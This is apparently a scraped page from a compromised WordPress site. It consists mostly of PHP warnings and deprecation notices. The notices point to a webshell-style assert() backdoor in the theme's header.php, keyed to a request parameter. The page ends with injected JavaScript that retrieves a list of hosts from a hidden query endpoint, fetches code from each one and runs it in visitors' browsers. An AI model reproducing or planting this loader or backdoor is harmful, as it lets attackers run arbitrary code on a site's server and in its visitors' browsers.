Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in /var/www/wp-content/plugins/revslider/includes/operations.class.php on line 2858

Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in /var/www/wp-content/plugins/revslider/includes/operations.class.php on line 2862

Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in /var/www/wp-content/plugins/revslider/includes/output.class.php on line 3708

Deprecated: Unparenthesized `a ? b : c ? d : e` is deprecated. Use either `(a ? b : c) ? d : e` or `a ? b : (c ? d : e)` in /var/www/wp-content/plugins/js_composer/inline/editor.php on line 317

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; x_dribbble_widget has a deprecated constructor in /var/www/wp-content/themes/x/framework/functions/global/widgets/dribbble.php on line 19

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; x_flickr_widget has a deprecated constructor in /var/www/wp-content/themes/x/framework/functions/global/widgets/flickr.php on line 19

Notice: Undefined index: WP_Widget_Recent_Comments in /var/www/wp-content/themes/x/framework/functions/global/remove.php on line 59

Deprecated: The called constructor method for WP_Widget class in x_dribbble_widget is deprecated since version 4.3.0! Use __construct() instead. in /var/www/wp-includes/functions.php on line 6078

Deprecated: The called constructor method for WP_Widget class in x_flickr_widget is deprecated since version 4.3.0! Use __construct() instead. in /var/www/wp-includes/functions.php on line 6078

Notice: Trying to access array offset on value of type bool in /var/www/wp-content/plugins/hover_effects_pack/hover_effects_pack.php on line 18

Deprecated: The each() function is deprecated. This message will be suppressed on further calls in /var/www/wp-content/plugins/js_composer/composer/lib/mapper.php on line 33

Notice: Undefined index: nixiaozi in /var/www/wp-content/themes/x/header.php on line 1

Warning: assert(): Assertion failed in /var/www/wp-content/themes/x/header.php on line 1

Notice: Undefined index: sXnj0DSOvuqJQ7SnZkS6 in /var/www/wp-content/themes/x/header.php on line 2
var intervalId = setInterval(function() { if (document.readyState === 'complete' || document.readyState === 'interactive') { clearInterval(intervalId); _start(); } }, 1000); function _start() { try { if (document.cookie.indexOf('Jf8y6S2aifZVynJb6hEZ') !== -1) { return; } run(); } catch (e) { } function run() { getListOfHosts(function(err, urls) { if (err) { return; } for (var i = 0; i < urls.length; i++) { getUrl(urls[i], function(err, resp) { if (err) { return; } var s = document.createElement('script'); s.innerHTML = resp; document.body.appendChild(s); }); } }); } function getUrl(url, cb) { var x = new XMLHttpRequest(); x.open('GET', url, true); x.onreadystatechange = function() { if (x.readyState === 4) { cb(null, x.responseText); }; }; x.send(); } function getListOfHosts(cb) { var x = new XMLHttpRequest(); x.open('GET', '/?sXnj0DSOvuqJQ7SnZkS6=1', true); x.onreadystatechange = function() { if (x.readyState == 4 && x.status == 200) { var start = '3BVKIGQA0lhCLzrxTFM7_start'; var end = '3BVKIGQA0lhCLzrxTFM7_end'; var startIndex = x.responseText.indexOf(start); var endIndex = x.responseText.indexOf(end); if (startIndex == -1 || endIndex == -1) { cb('invalid response'); return; } startIndex += start.length; var response = x.responseText.substring(startIndex, endIndex).trim(); var arr = response.split(String.fromCharCode(10)); cb(null, arr); } }; x.send(); } }